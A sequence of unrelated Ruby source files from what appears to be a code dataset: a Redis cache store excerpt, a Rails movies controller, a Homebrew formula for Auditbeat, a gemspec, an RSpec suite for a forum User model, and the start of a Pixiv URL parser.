# Keys longer than max_key_bytesize are shortened to a prefix plus a
# SHA2 digest suffix, keeping them unique while fitting the limit.
def truncate_key(key)
  return key unless key && key.bytesize > max_key_bytesize
  digest_suffix = ":sha2:#{::Digest::SHA2.hexdigest(key)}"
  prefix_length = max_key_bytesize - digest_suffix.bytesize
  "#{key.byteslice(0, prefix_length)}#{digest_suffix}"
end
# Rebuild an Entry from its stored form: raw payloads are wrapped
# directly, everything else is Marshal-decoded. nil input yields nil.
def deserialize_entry(serialized_entry, raw:)
  return unless serialized_entry
  raw ? Entry.new(serialized_entry) : Marshal.load(serialized_entry)
end
# Serialize an entry for storage: raw mode stores the stringified value
# only (enabling incr/decr); otherwise the whole entry is Marshal-dumped.
def serialize_entry(entry, raw: false)
  raw ? entry.value.to_s : Marshal.dump(entry)
end
# Serialize every value of the entries hash, preserving keys.
def serialize_entries(entries, raw: false)
  entries.each_with_object({}) do |(key, entry), serialized|
    serialized[key] = serialize_entry(entry, raw: raw)
  end
end
# Run the block, converting any Redis error into the +returning+
# fallback value after notifying the configured error handler.
def failsafe(method, returning: nil)
  begin
    yield
  rescue ::Redis::BaseError => error
    handle_exception(exception: error, method: method, returning: returning)
    returning
  end
end
# Forward a caught Redis error to the configured handler. A crash inside
# the handler itself is only warned about, never raised.
def handle_exception(exception:, method:, returning:)
  @error_handler&.call(method: method, exception: exception, returning: returning)
rescue => handler_error
  warn "RedisCacheStore ignored exception in handle_exception: #{handler_error.class}: #{handler_error.message}\n #{handler_error.backtrace.join("\n ")}"
end
end
end
end
| 33.626263 | 181 | 0.587504 |
6acdec1595444cfa3e1d61d401e54f4a04807569 | 1,167 | class MoviesController < ApplicationController
before_action :set_movie, only: [:show, :edit, :update, :destroy]
# GET /movies
def index
@movies = Movie.all
end
# GET /movies/1
def show
end
# GET /movies/new
def new
@movie = Movie.new
end
# GET /movies/1/edit
def edit
end
# POST /movies
# Builds a movie from the permitted params; redirects on success,
# re-renders the form on validation failure.
def create
  @movie = Movie.new(movie_params)

  unless @movie.save
    render action: 'new'
    return
  end

  redirect_to @movie, notice: 'Movie was successfully created.'
end
# PATCH/PUT /movies/1
# Applies the permitted params to the movie loaded by set_movie;
# redirects on success, re-renders the form on validation failure.
def update
  unless @movie.update(movie_params)
    render action: 'edit'
    return
  end

  redirect_to @movie, notice: 'Movie was successfully updated.'
end
# DELETE /movies/1
# Removes the movie loaded by the set_movie before_action, then
# redirects to the index with a flash notice.
def destroy
  @movie.destroy
  redirect_to movies_url, notice: 'Movie was successfully destroyed.'
end
private
# Use callbacks to share common setup or constraints between actions.
# Loads the movie identified by params[:id] into @movie.
# Movie.find raises ActiveRecord::RecordNotFound when no record exists.
def set_movie
  @movie = Movie.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
# Strong parameters: restricts mass assignment to the listed attributes.
def movie_params
  params.require(:movie).permit(:title, :description, :release_date, :rating)
end
end
| 19.779661 | 81 | 0.659811 |
9111b146846ceb8c6a571aa73b11129b08fb4c24 | 4,406 | class Auditbeat < Formula
desc "Lightweight Shipper for Audit Data"
homepage "https://www.elastic.co/products/beats/auditbeat"
url "https://github.com/elastic/beats.git",
:tag => "v6.8.3",
:revision => "9be0dc0ce65850ca0efb7310a87affa193a513a2"
head "https://github.com/elastic/beats.git"
bottle do
cellar :any_skip_relocation
sha256 "7b830c220246bff5b9933763416d5abfebdd926aff81afa39bdd9dfdfd5dc3c9" => :catalina
sha256 "7da4bb108a66964330626f6c5686b154ba2d7fe25c07261e2983ed8b6247795a" => :mojave
sha256 "27f96ccc35baf1d0131d865ca7b185ef26e80e601942f342171ca73e89dbd8a7" => :high_sierra
sha256 "1c3e774898129fbf3972a36657313bd1099d9479c9b05235cc50422410f4f552" => :sierra
end
depends_on "go" => :build
depends_on "python@2" => :build # does not support Python 3
resource "virtualenv" do
url "https://files.pythonhosted.org/packages/8b/f4/360aa656ddb0f4168aeaa1057d8784b95d1ce12f34332c1cf52420b6db4e/virtualenv-16.3.0.tar.gz"
sha256 "729f0bcab430e4ef137646805b5b1d8efbb43fe53d4a0f33328624a84a5121f7"
end
# Patch required to build against go 1.11 (Can be removed with v7.0.0)
# partially backport of https://github.com/elastic/beats/commit/8d8eaf34a6cb5f3b4565bf40ca0dc9681efea93c
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/a0f8cdc0/auditbeat/go1.11.diff"
sha256 "8a00cb0265b6e2de3bc76f14f2ee4f1a5355dad490f3db9288d968b3e95ae0eb"
end
def install
  # remove non open source files (Elastic-licensed x-pack components)
  rm_rf "x-pack"

  # Beats is a Go project: stage the sources into a GOPATH layout.
  ENV["GOPATH"] = buildpath
  (buildpath/"src/github.com/elastic/beats").install buildpath.children

  # Build tooling needs a Python 2 virtualenv on the PATH.
  ENV.prepend_create_path "PYTHONPATH", buildpath/"vendor/lib/python2.7/site-packages"
  resource("virtualenv").stage do
    system "python", *Language::Python.setup_install_args(buildpath/"vendor")
  end
  ENV.prepend_path "PATH", buildpath/"vendor/bin" # for virtualenv
  ENV.prepend_path "PATH", buildpath/"bin" # for mage (build tool)

  cd "src/github.com/elastic/beats/auditbeat" do
    # don't build docs because it would fail creating the combined OSS/x-pack
    # docs and we aren't installing them anyway
    inreplace "magefile.go", "mage.GenerateModuleIncludeListGo, Docs)",
    "mage.GenerateModuleIncludeListGo)"

    system "make", "mage"
    # prevent downloading binary wheels during python setup
    system "make", "PIP_INSTALL_COMMANDS=--no-binary :all", "python-env"
    system "mage", "-v", "build"
    system "mage", "-v", "update"

    (etc/"auditbeat").install Dir["auditbeat.*", "fields.yml"]
    (libexec/"bin").install "auditbeat"
    prefix.install "build/kibana"
  end
  prefix.install_metafiles buildpath/"src/github.com/elastic/beats"

  # Wrapper script pointing auditbeat at Homebrew-appropriate
  # config/data/log locations instead of its compiled-in defaults.
  (bin/"auditbeat").write <<~EOS
    #!/bin/sh
    exec #{libexec}/bin/auditbeat \
    --path.config #{etc}/auditbeat \
    --path.data #{var}/lib/auditbeat \
    --path.home #{prefix} \
    --path.logs #{var}/log/auditbeat \
    "$@"
  EOS
end
# Ensure the runtime data and log directories exist after (re)install.
def post_install
  %w[lib/auditbeat log/auditbeat].each { |dir| (var/dir).mkpath }
end
plist_options :manual => "auditbeat"
def plist; <<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/auditbeat</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
(testpath/"files").mkpath
(testpath/"config/auditbeat.yml").write <<~EOS
auditbeat.modules:
- module: file_integrity
paths:
- #{testpath}/files
output.file:
path: "#{testpath}/auditbeat"
filename: auditbeat
EOS
pid = fork do
exec "#{bin}/auditbeat", "-path.config", testpath/"config", "-path.data", testpath/"data"
end
sleep 5
begin
touch testpath/"files/touch"
sleep 30
s = IO.readlines(testpath/"auditbeat/auditbeat").last(1)[0]
assert_match "\"action\":\[\"created\"\]", s
realdirpath = File.realdirpath(testpath)
assert_match "\"path\":\"#{realdirpath}/files/touch\"", s
ensure
Process.kill "SIGINT", pid
Process.wait pid
end
end
end
| 33.633588 | 141 | 0.670676 |
39c36b8246347126f483e8fcbf979397bac29bf2 | 1,103 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'rapid_api/version'
Gem::Specification.new do |spec|
  # Gem identity and ownership metadata.
  spec.name = 'rapidapi_connect'
  spec.version = RapidAPI::VERSION
  spec.authors = ['Unathi Chonco']
  spec.email = ['[email protected]']

  spec.summary = %q{Connect to blocks on the rapidapi.com marketplace}
  spec.description = %q{This Gem allows you to connect to RapidAPI blocks in your ruby app.}
  spec.homepage = 'https://github.com/choncou/RapidAPIConnect_ruby'
  spec.license = 'MIT'

  # Ship every git-tracked file except tests/specs/features.
  spec.files = `git ls-files -z`.split("\x0").reject do |f|
    f.match(%r{^(test|spec|features)/})
  end
  spec.bindir = 'exe'
  spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
  spec.require_paths = ['lib']

  # Development-only dependencies (not installed for gem consumers).
  spec.add_development_dependency 'bundler', '~> 1.13'
  spec.add_development_dependency 'rake', '~> 10.0'
  spec.add_development_dependency 'rspec', '~> 3.0'
  spec.add_development_dependency 'byebug', '~> 9.0', '>= 9.0.6'
end
| 38.034483 | 94 | 0.653672 |
b97541d38a5abe779823812a7354e538a26cab3f | 20,817 | require 'rails_helper'
require 'digest/md5'
describe User, type: :model do
before do
allow_any_instance_of(User).to receive(:update_index).and_return(true)
end
let(:topic) { create :topic }
let(:user) { create :user }
let(:user2) { create :user }
let(:reply) { create :reply }
let(:user_for_delete1) { create :user }
let(:user_for_delete2) { create :user }
describe 'user_type' do
it { expect(user.user_type).to eq :user }
end
describe 'login format' do
context 'huacnlee' do
let(:user) { build(:user, login: 'huacnlee') }
it { expect(user.valid?).to eq true }
end
context 'huacnlee-github' do
let(:user) { build(:user, login: 'huacnlee-github') }
it { expect(user.valid?).to eq true }
end
context 'huacnlee_github' do
let(:user) { build(:user, login: 'huacnlee_github') }
it { expect(user.valid?).to eq true }
end
context 'huacnlee12' do
let(:user) { build(:user, login: 'huacnlee12') }
it { expect(user.valid?).to eq true }
end
context '123411' do
let(:user) { build(:user, login: '123411') }
it { expect(user.valid?).to eq true }
end
context 'zicheng.lhs' do
let(:user) { build(:user, login: 'zicheng.lhs') }
it { expect(user.valid?).to eq true }
end
context 'll&&^12' do
let(:user) { build(:user, login: '*ll&&^12') }
it { expect(user.valid?).to eq false }
end
context 'abdddddc$' do
let(:user) { build(:user, login: 'abdddddc$') }
it { expect(user.valid?).to eq false }
end
context '$abdddddc' do
let(:user) { build(:user, login: '$abdddddc') }
it { expect(user.valid?).to eq false }
end
context 'aaa*11' do
let(:user) { build(:user, login: 'aaa*11') }
it { expect(user.valid?).to eq false }
end
describe 'Login allow upcase downcase both' do
let(:user1) { create(:user, login: 'ReiIs123') }
it 'should work' do
expect(user1.login).to eq('ReiIs123')
expect(User.find_by_login('ReiIs123').id).to eq(user1.id)
expect(User.find_by_login('reiis123').id).to eq(user1.id)
expect(User.find_by_login('rEIIs123').id).to eq(user1.id)
end
end
end
describe '#read_topic?' do
before do
allow_any_instance_of(User).to receive(:update_index).and_return(true)
Rails.cache.write("user:#{user.id}:topic_read:#{topic.id}", nil)
end
it 'marks the topic as unread' do
expect(user.topic_read?(topic)).to eq(false)
user.read_topic(topic)
expect(user.topic_read?(topic)).to eq(true)
expect(user2.topic_read?(topic)).to eq(false)
end
it 'marks the topic as unread when got new reply' do
topic.replies << reply
expect(user.topic_read?(topic)).to eq(false)
user.read_topic(topic)
expect(user.topic_read?(topic)).to eq(true)
end
it 'user can soft_delete' do
user_for_delete1.soft_delete
user_for_delete1.reload
expect(user_for_delete1.state).to eq('deleted')
user_for_delete2.soft_delete
user_for_delete1.reload
expect(user_for_delete1.state).to eq('deleted')
expect(user_for_delete1.authorizations).to eq([])
end
end
describe '#filter_readed_topics' do
let(:topics) { create_list(:topic, 3) }
it 'should work' do
user.read_topic(topics[1])
user.read_topic(topics[2])
expect(user.filter_readed_topics(topics)).to eq([topics[1].id, topics[2].id])
end
it 'should work when params is nil or empty' do
expect(user.filter_readed_topics(nil)).to eq([])
expect(user.filter_readed_topics([])).to eq([])
end
end
describe 'location' do
it 'should not get results when user location not set' do
Location.count == 0
end
it 'should get results when user location is set' do
user.location = 'hangzhou'
user2.location = 'Hongkong'
Location.count == 2
end
it 'should update users_count when user location changed' do
old_name = user.location
new_name = 'HongKong'
old_location = Location.location_find_by_name(old_name)
hk_location = create(:location, name: new_name, users_count: 20)
user.location = new_name
user.save
user.reload
expect(user.location).to eq(new_name)
expect(user.location_id).to eq(hk_location.id)
expect(Location.location_find_by_name(old_name).users_count).to eq(old_location.users_count - 1)
expect(Location.location_find_by_name(new_name).users_count).to eq(hk_location.users_count + 1)
end
end
describe 'admin?' do
let(:admin) { create :admin }
it 'should know you are an admin' do
expect(admin).to be_admin
end
it 'should know normal user is not admin' do
expect(user).not_to be_admin
end
end
describe 'wiki_editor?' do
let(:admin) { create :admin }
it 'should know admin is wiki editor' do
expect(admin).to be_wiki_editor
end
it 'should know verified user is wiki editor' do
user.verified = true
expect(user).to be_wiki_editor
end
it 'should know not verified user is not a wiki editor' do
user.verified = false
expect(user).not_to be_wiki_editor
end
end
describe 'newbie?' do
it 'should true when user created_at less than a week' do
user.verified = false
allow(Setting).to receive(:newbie_limit_time).and_return(1.days.to_i)
user.created_at = 6.hours.ago
expect(user.newbie?).to be_truthy
end
it 'should false when user is verified' do
user.verified = true
expect(user.newbie?).to be_falsey
end
context 'Unverfied user with 2.days.ago registed.' do
let(:user) { build(:user, verified: false, created_at: 2.days.ago) }
it 'should tru with 1 days limit' do
allow(Setting).to receive(:newbie_limit_time).and_return(1.days.to_i)
expect(user.newbie?).to be_falsey
end
it 'should false with 3 days limit' do
allow(Setting).to receive(:newbie_limit_time).and_return(3.days.to_i)
expect(user.newbie?).to be_truthy
end
it 'should false with nil limit' do
allow(Setting).to receive(:newbie_limit_time).and_return(nil)
expect(user.newbie?).to be_falsey
end
it 'should false with 0 limit' do
allow(Setting).to receive(:newbie_limit_time).and_return('0')
expect(user.newbie?).to be_falsey
end
end
end
describe 'roles' do
subject { user }
context 'when is a new user' do
let(:user) { create :user }
it { expect(user.roles?(:member)).to eq true }
end
context 'when is a blocked user' do
let(:user) { create :blocked_user }
it { expect(user.roles?(:member)).not_to eq true }
end
context 'when is a deleted user' do
let(:user) { create :blocked_user }
it { expect(user.roles?(:member)).not_to eq true }
end
context 'when is admin' do
let(:user) { create :admin }
it { expect(user.roles?(:admin)).to eq true }
end
context 'when is wiki editor' do
let(:user) { create :wiki_editor }
it { expect(user.roles?(:wiki_editor)).to eq true }
end
context 'when ask for some random role' do
let(:user) { create :user }
it { expect(user.roles?(:savior_of_the_broken)).not_to eq true }
end
end
describe 'github url' do
subject { create(:user, github: 'monkey') }
let(:expected) { 'https://github.com/monkey' }
context 'user name provided correct' do
describe '#github_url' do
subject { super().github_url }
it { is_expected.to eq(expected) }
end
end
context 'user name provided as full url' do
before { allow(subject).to receive(:github).and_return('http://github.com/monkey') }
describe '#github_url' do
subject { super().github_url }
it { is_expected.to eq(expected) }
end
end
end
describe 'website_url' do
subject { create(:user, website: 'monkey.com') }
let(:expected) { 'http://monkey.com' }
context 'website without http://' do
describe '#website_url' do
subject { super().website_url }
it { is_expected.to eq(expected) }
end
end
context 'website with http://' do
before { allow(subject).to receive(:github).and_return('http://monkey.com') }
describe '#website_url' do
subject { super().website_url }
it { is_expected.to eq(expected) }
end
end
end
# Favoriting examples; `user` and `topic` come from let-definitions declared
# earlier in this spec file.
describe 'favorite topic' do
  it 'should favorite a topic' do
    user.favorite_topic(topic.id)
    expect(user.favorite_topic_ids.include?(topic.id)).to eq(true)
    # nil is rejected; favoriting the same topic again still returns true
    expect(user.favorite_topic(nil)).to eq(false)
    expect(user.favorite_topic(topic.id)).to eq(true)
    expect(user.favorite_topic_ids.include?(topic.id)).to eq(true)
    expect(user.favorite_topic?(topic.id)).to eq(true)
  end
  it 'should unfavorite a topic' do
    user.unfavorite_topic(topic.id)
    expect(user.favorite_topic_ids.include?(topic.id)).to eq(false)
    expect(user.unfavorite_topic(nil)).to eq(false)
    # both the raw id and the record itself are accepted
    expect(user.unfavorite_topic(topic)).to eq(true)
    expect(user.favorite_topic?(topic)).to eq(false)
  end
end
# Like/unlike semantics for topics and replies, including the counter cache
# (likes_count), the id list (like_by_user_ids) and the self-like guard.
describe 'Like' do
  let(:topic) { create :topic }
  let(:user) { create :user }
  let(:user2) { create :user }
  describe 'like topic' do
    it 'can like/unlike topic' do
      user.like(topic)
      topic.reload
      expect(topic.likes_count).to eq(1)
      expect(topic.like_by_user_ids).to include(user.id)
      user2.like(topic)
      topic.reload
      expect(topic.likes_count).to eq(2)
      expect(topic.like_by_user_ids).to include(user2.id)
      expect(user.liked?(topic)).to eq(true)
      user2.unlike(topic)
      topic.reload
      expect(topic.likes_count).to eq(1)
      expect(topic.like_by_user_ids).not_to include(user2.id)
      # can't like itself
      topic.user.like(topic)
      topic.reload
      expect(topic.likes_count).to eq(1)
      expect(topic.like_by_user_ids).not_to include(topic.user_id)
      # can't unlike itself
      topic.user.unlike(topic)
      topic.reload
      expect(topic.likes_count).to eq(1)
      expect(topic.like_by_user_ids).not_to include(topic.user_id)
    end
    it 'can tell whether or not liked by a user' do
      expect(user.like_topic?(topic)).to be_falsey
      user.like(topic)
      topic.reload
      expect(user.like_topic?(topic)).to be_truthy
      expect(topic.like_by_users).to include(user)
    end
  end
  describe 'like reply' do
    let(:reply) { create :reply }
    it 'should work' do
      user.like(reply)
      expect(user.like_reply?(reply)).to be_truthy
    end
    describe '.like_reply_ids_by_replies' do
      let(:replies) { create_list(:reply, 3) }
      it 'should work' do
        user.like(replies[0])
        user.like(replies[2])
        # returns only the ids of the given replies this user has liked
        like_ids = user.like_reply_ids_by_replies(replies)
        expect(like_ids).not_to include(replies[1].id)
        expect(like_ids).to include(replies[0].id, replies[2].id)
      end
    end
  end
end
# email_md5 must track the email attribute, both via assignment+save and via
# plain attribute assignment on an unsaved record.
describe 'email and email_md5' do
  it 'should generate email_md5 when give value to email attribute' do
    user.email = '[email protected]'
    user.save
    expect(user.email_md5).to eq(Digest::MD5.hexdigest('[email protected]'))
    expect(user.email).to eq('[email protected]')
  end
  # Fix: "genrate" typo corrected in the example name below.
  it 'should generate email_md5 with params' do
    u = User.new
    u.email = '[email protected]'
    expect(u.email).to eq('[email protected]')
    expect(u.email_md5).to eq(Digest::MD5.hexdigest('[email protected]'))
  end
end
# User.find_by_login! resolves a login case-insensitively and raises
# ActiveRecord::RecordNotFound for unknown or malformed logins.
describe '#find_by_login!' do
  let(:user) { create :user }
  it 'should work' do
    u = User.find_by_login!(user.login)
    expect(u.id).to eq user.id
    expect(u.login).to eq(user.login)
  end
  it 'should ignore case' do
    u = User.find_by_login!(user.login.upcase)
    expect(u.id).to eq user.id
  end
  it 'should raise DocumentNotFound error' do
    expect do
      User.find_by_login!(user.login + '1')
    end.to raise_error(ActiveRecord::RecordNotFound)
  end
  # ("railse" typo fixed in the example name.)
  it 'should raise DocumentNotFound if have bad login' do
    expect do
      User.find_by_login!(user.login + ')')
    end.to raise_error(ActiveRecord::RecordNotFound)
  end
  context 'Simple prefix user exists' do
    # Fix: the third fixture was a second `let(:user2)` that silently shadowed
    # the 'foobar' one, and plain `let` is lazy, so the unreferenced users were
    # never created at all. `let!` with distinct names makes all three records
    # exist, so the exact-match lookup is genuinely disambiguating.
    let!(:user1) { create :user, login: 'foo' }
    let!(:user2) { create :user, login: 'foobar' }
    let!(:user3) { create :user, login: 'a2foo' }
    it 'should get right user' do
      u = User.find_by_login!(user1.login)
      expect(u.id).to eq user1.id
      expect(u.login).to eq(user1.login)
    end
  end
end
# Blocking is recorded on both sides: blocker keeps block_user_ids, blockee
# keeps block_by_user_ids.
describe '.block_user' do
  let(:user) { create :user }
  let(:u2) { create :user }
  let(:u3) { create :user }
  it 'should work' do
    user.block_user(u2)
    user.block_user(u3)
    expect(user.block_user_ids).to include(u2.id, u3.id)
    expect(u2.block_by_user_ids).to include(user.id)
    expect(u3.block_by_user_ids).to include(user.id)
  end
end
# Following mirrors blocking (two-sided id lists) and unfollow clears both sides.
describe '.follow_user' do
  let(:u1) { create :user }
  let(:u2) { create :user }
  let(:u3) { create :user }
  it 'should work' do
    u1.follow_user(u2)
    u1.follow_user(u3)
    expect(u1.follow_user_ids).to include(u2.id, u3.id)
    expect(u2.follow_by_user_ids).to eq [u1.id]
    expect(u3.follow_by_user_ids).to eq [u1.id]
    # Unfollow
    u1.unfollow_user(u3)
    expect(u1.follow_user_ids).to eq [u2.id]
    u3.reload
    expect(u3.follow_by_user_ids).to eq []
  end
end
# favorites_count just counts favorited topic ids (raw ids are accepted).
describe '.favorites_count' do
  let(:u1) { create :user }
  it 'should work' do
    u1.favorite_topic(1)
    u1.favorite_topic(2)
    expect(u1.favorites_count).to eq(2)
  end
end
# level/level_name mapping, one predicate stubbed per context; the display
# names are intentionally Chinese and must not be altered.
describe '.level / .level_name' do
  let(:u1) { create(:user) }
  context 'admin' do
    it 'should work' do
      allow(u1).to receive(:admin?).and_return(true)
      expect(u1.level).to eq('admin')
      expect(u1.level_name).to eq('管理员')
    end
  end
  context 'vip' do
    it 'should work' do
      allow(u1).to receive(:verified?).and_return(true)
      expect(u1.level).to eq('vip')
      expect(u1.level_name).to eq('高级会员')
    end
  end
  context 'blocked' do
    it 'should work' do
      allow(u1).to receive(:blocked?).and_return(true)
      expect(u1.level).to eq('blocked')
      expect(u1.level_name).to eq('禁言用户')
    end
  end
  context 'newbie' do
    it 'should work' do
      allow(u1).to receive(:newbie?).and_return(true)
      expect(u1.level).to eq('newbie')
      expect(u1.level_name).to eq('新手')
    end
  end
  context 'normal' do
    it 'should work' do
      allow(u1).to receive(:newbie?).and_return(false)
      expect(u1.level).to eq('normal')
      expect(u1.level_name).to eq('会员')
    end
  end
end
# Generated letter avatars live under the app's base URL.
describe '.letter_avatar_url' do
  let(:user) { create(:user) }
  it 'should work' do
    expect(user.letter_avatar_url(240)).to include("#{Setting.base_url}/system/letter_avatars/")
  end
end
# avatar? reflects raw column presence (written via u[:avatar] to bypass the uploader).
describe '.avatar?' do
  it 'should return false when avatar is nil' do
    u = User.new
    u[:avatar] = nil
    expect(u.avatar?).to eq(false)
  end
  it 'should return true when avatar is not nil' do
    u = User.new
    u[:avatar] = '1234'
    expect(u.avatar?).to eq(true)
  end
end
# Devise lookup hook: accepts either login or email, and hides deleted accounts.
describe '#find_for_database_authentication' do
  let!(:user) { create(:user, login: 'foo', email: '[email protected]') }
  it 'should work' do
    expect(User.find_for_database_authentication(login: 'foo').id).to eq user.id
    expect(User.find_for_database_authentication(login: '[email protected]').id).to eq user.id
    expect(User.find_for_database_authentication(login: 'not found')).to eq nil
  end
  context 'deleted user' do
    it "should nil" do
      # state: -1 marks a deleted account
      user.update(state: -1)
      expect(User.find_for_database_authentication(login: 'foo')).to eq nil
    end
  end
end
# example.com emails are treated as locked placeholders.
describe '.email_locked?' do
  it { expect(User.new(email: '[email protected]').email_locked?).to eq true }
  it { expect(User.new(email: '[email protected]').email_locked?).to eq false }
end
# calendar_data buckets the user's replies per day, keyed by the day's epoch
# seconds rendered as a string.
describe '.calendar_data' do
  let!(:user) { create(:user) }
  it 'should work' do
    # Fix: `1.day.ago` (singular) is the grammatical ActiveSupport form;
    # `1.days.ago` works but reads wrong.
    d1 = 1.day.ago
    d2 = 3.days.ago
    d3 = 10.days.ago
    create(:reply, user: user, created_at: d1)
    create_list(:reply, 2, user: user, created_at: d2)
    create_list(:reply, 6, user: user, created_at: d3)
    data = user.calendar_data
    expect(data.keys.count).to eq 3
    expect(data.keys).to include(d1.to_date.to_time.to_i.to_s, d2.to_date.to_time.to_i.to_s, d3.to_date.to_time.to_i.to_s)
    expect(data[d1.to_date.to_time.to_i.to_s]).to eq 1
    expect(data[d2.to_date.to_time.to_i.to_s]).to eq 2
    expect(data[d3.to_date.to_time.to_i.to_s]).to eq 6
  end
end
# large_avatar_url falls back to a 192px letter avatar when no upload exists.
describe '.large_avatar_url' do
  let(:user) { build(:user) }
  context 'avatar is nil' do
    it 'should return letter_avatar_url' do
      user.avatar = nil
      expect(user.large_avatar_url).to include('system/letter_avatars/')
      expect(user.large_avatar_url).to include('192.png')
    end
  end
  context 'avatar is present' do
    it 'should return upload url' do
      user[:avatar] = 'aaa.jpg'
      expect(user.large_avatar_url).to eq user.avatar.url(:lg)
    end
  end
end
# team_collection yields [name, id] pairs; admins see every team.
# (`user` / `user2` are let-definitions declared earlier in this file.)
describe '.team_collection' do
  it 'should work' do
    team_users = create_list(:team_user, 2, user: user)
    teams = team_users.collect(&:team).sort
    expect(user.team_collection.sort).to eq(teams.collect { |t| [t.name, t.id] })
  end
  it 'should get all with admin' do
    ids1 = create_list(:team_user, 2, user: user).collect(&:team_id)
    ids2 = create_list(:team_user, 2, user: user2).collect(&:team_id)
    expect(user).to receive(:admin?).and_return(true)
    expect(user.team_collection.collect { |_, id| id }).to include(*(ids1 + ids2))
  end
end
# indexed_changed? should flip to true only when a search-indexed field
# (login, name, email, bio, tagline, location) changes; other attribute
# changes must not trigger a re-index.
describe 'Search methods' do
  let(:u) { create :user, bio: '111', tagline: '222' }
  describe '.indexed_changed?' do
    before(:each) do
      u.reload
    end
    it 'login changed work' do
      expect(u.indexed_changed?).to eq false
      u.login = u.login + '111'
      u.save
      expect(u.indexed_changed?).to eq true
    end
    it 'name changed work' do
      expect(u.indexed_changed?).to eq false
      u.update(name: u.name + '111')
      expect(u.indexed_changed?).to eq true
    end
    it 'email changed work' do
      expect(u.indexed_changed?).to eq false
      u.update(email: u.email + '111')
      expect(u.indexed_changed?).to eq true
    end
    it 'bio changed work' do
      expect(u.indexed_changed?).to eq false
      u.update(bio: u.bio + '111')
      expect(u.indexed_changed?).to eq true
    end
    it 'tagline changed work' do
      expect(u.indexed_changed?).to eq false
      u.update(tagline: u.tagline + '111')
      expect(u.indexed_changed?).to eq true
    end
    it 'location changed work' do
      expect(u.indexed_changed?).to eq false
      u.update(location: u.location + '111')
      expect(u.indexed_changed?).to eq true
    end
    it 'other changed work' do
      expect(u.indexed_changed?).to eq false
      # none of these fields is indexed, so no re-index should be requested
      u.website = '124124124'
      u.github = '124u812'
      u.avatar = '---'
      u.sign_in_count = 190
      u.last_sign_in_at = Time.now
      u.replies_count = u.replies_count + 10
      u.save
      expect(u.indexed_changed?).to eq false
    end
  end
end
# User.search: prefix match on login/name, ordered by activity
# (replies_count); with user:, followed users are boosted to the front.
describe '#search' do
  before do
    @rei = create(:user, login: 'Rei', replies_count: 5)
    @rain = create(:user, login: 'rain')
    @huacnlee = create(:user, login: 'huacnlee')
    @hugo = create(:user, login: 'Hugo', name: 'Rugo', replies_count: 2)
    @hot = create(:user, login: 'hot')
  end
  it 'should work simple query' do
    res = User.search('r')
    expect(res[0].id).to eq @rei.id
    expect(res[1].id).to eq @hugo.id
    expect(res[2].id).to eq @rain.id
    expect(User.search('r').size).to eq 3
    expect(User.search('re').size).to eq 1
    expect(User.search('h').size).to eq 3
    expect(User.search('hu').size).to eq 2
  end
  it 'should work with :user option to include following users first' do
    @rei.follow_user(@hugo)
    res = User.search('r', user: @rei, limit: 2)
    expect(res[0].id).to eq @hugo.id
    expect(res[1].id).to eq @rei.id
    expect(res.length).to eq 2
  end
end
end
| 29.402542 | 124 | 0.624057 |
5d4f0de3f9284944c94b3dcb62bd28288f45d800 | 702 | # CocoaPods spec for HokoConnectKit, distributed as a prebuilt binary
# framework (vendored_frameworks) rather than compiled from source.
Pod::Spec.new do |s|
  s.name = 'HokoConnectKit'
  s.version = '3.1.6'
  s.license = 'MIT'
  s.summary = 'Hoko Connect Kit'
  s.description = 'Hoko Connect Kit iOS SDK. Changing the way apps connect.'
  s.homepage = 'http://hoko.io'
  s.social_media_url = 'http://twitter.com/hoko_io'
  s.authors = {
    'Hokolinks S.A' => '[email protected]',
    'Goncalo Ferreira' => '[email protected]',
    'Ricardo Otero' => '[email protected]'
  }
  s.source = {:git => 'https://github.com/hoko/HokoConnectKit.git', :tag => s.version }
  s.ios.deployment_target = '8.0'
  s.preserve_paths = 'HokoConnectKit.framework'
  s.vendored_frameworks = 'HokoConnectKit.framework'
  s.requires_arc = true
end
| 30.521739 | 87 | 0.660969 |
1a97aafe8090ade2619b61ed3120091f155db132 | 3,161 | module Sources
module Alternates
# Recognises pixiv.net / pximg.net URLs in all their historical forms and
# canonicalises them to the member_illust.php?illust_id=... submission URL.
class Pixiv < Base
  MONIKER = %r!(?:[a-zA-Z0-9_-]+)!
  PROFILE = %r!\Ahttps?://www\.pixiv\.net/member\.php\?id=[0-9]+\z!
  DATE = %r!(?<date>\d{4}/\d{2}/\d{2}/\d{2}/\d{2}/\d{2})!i
  EXT = %r!(?:jpg|jpeg|png|gif)!i
  # Pixiv links are always upgraded to https.
  def force_https?
    true
  end
  def domains
    ["pixiv.net", "pximg.net"]
  end
  # Sets @submission_url when an illust id can be extracted from the URL.
  def parse
    id = illust_id
    if id
      @submission_url = "https://www.pixiv.net/member_illust.php?mode=medium&illust_id=#{id}"
    end
  end
  private
  # Extracts the numeric illust id from any supported pixiv URL shape, setting
  # @direct_url when the URL points straight at an image file.
  # NOTE(review): returns 0 (truthy in Ruby) for an unparseable URL, so #parse
  # will build "...illust_id=0" — confirm that is intentional before changing.
  def illust_id
    return 0 if parsed_url.nil?
    url = parsed_url
    # http://www.pixiv.net/member_illust.php?mode=medium&illust_id=18557054
    # http://www.pixiv.net/member_illust.php?mode=big&illust_id=18557054
    # http://www.pixiv.net/member_illust.php?mode=manga&illust_id=18557054
    # http://www.pixiv.net/member_illust.php?mode=manga_big&illust_id=18557054&page=1
    if url.host == "www.pixiv.net" && url.path == "/member_illust.php" && url.query_values["illust_id"].present?
      return url.query_values["illust_id"].to_i
    # http://www.pixiv.net/i/18557054
    elsif url.host == "www.pixiv.net" && url.path =~ %r!\A/i/(?<illust_id>\d+)\z!i
      return $~[:illust_id].to_i
    # http://img18.pixiv.net/img/evazion/14901720.png
    # http://i2.pixiv.net/img18/img/evazion/14901720.png
    # http://i2.pixiv.net/img18/img/evazion/14901720_m.png
    # http://i2.pixiv.net/img18/img/evazion/14901720_s.png
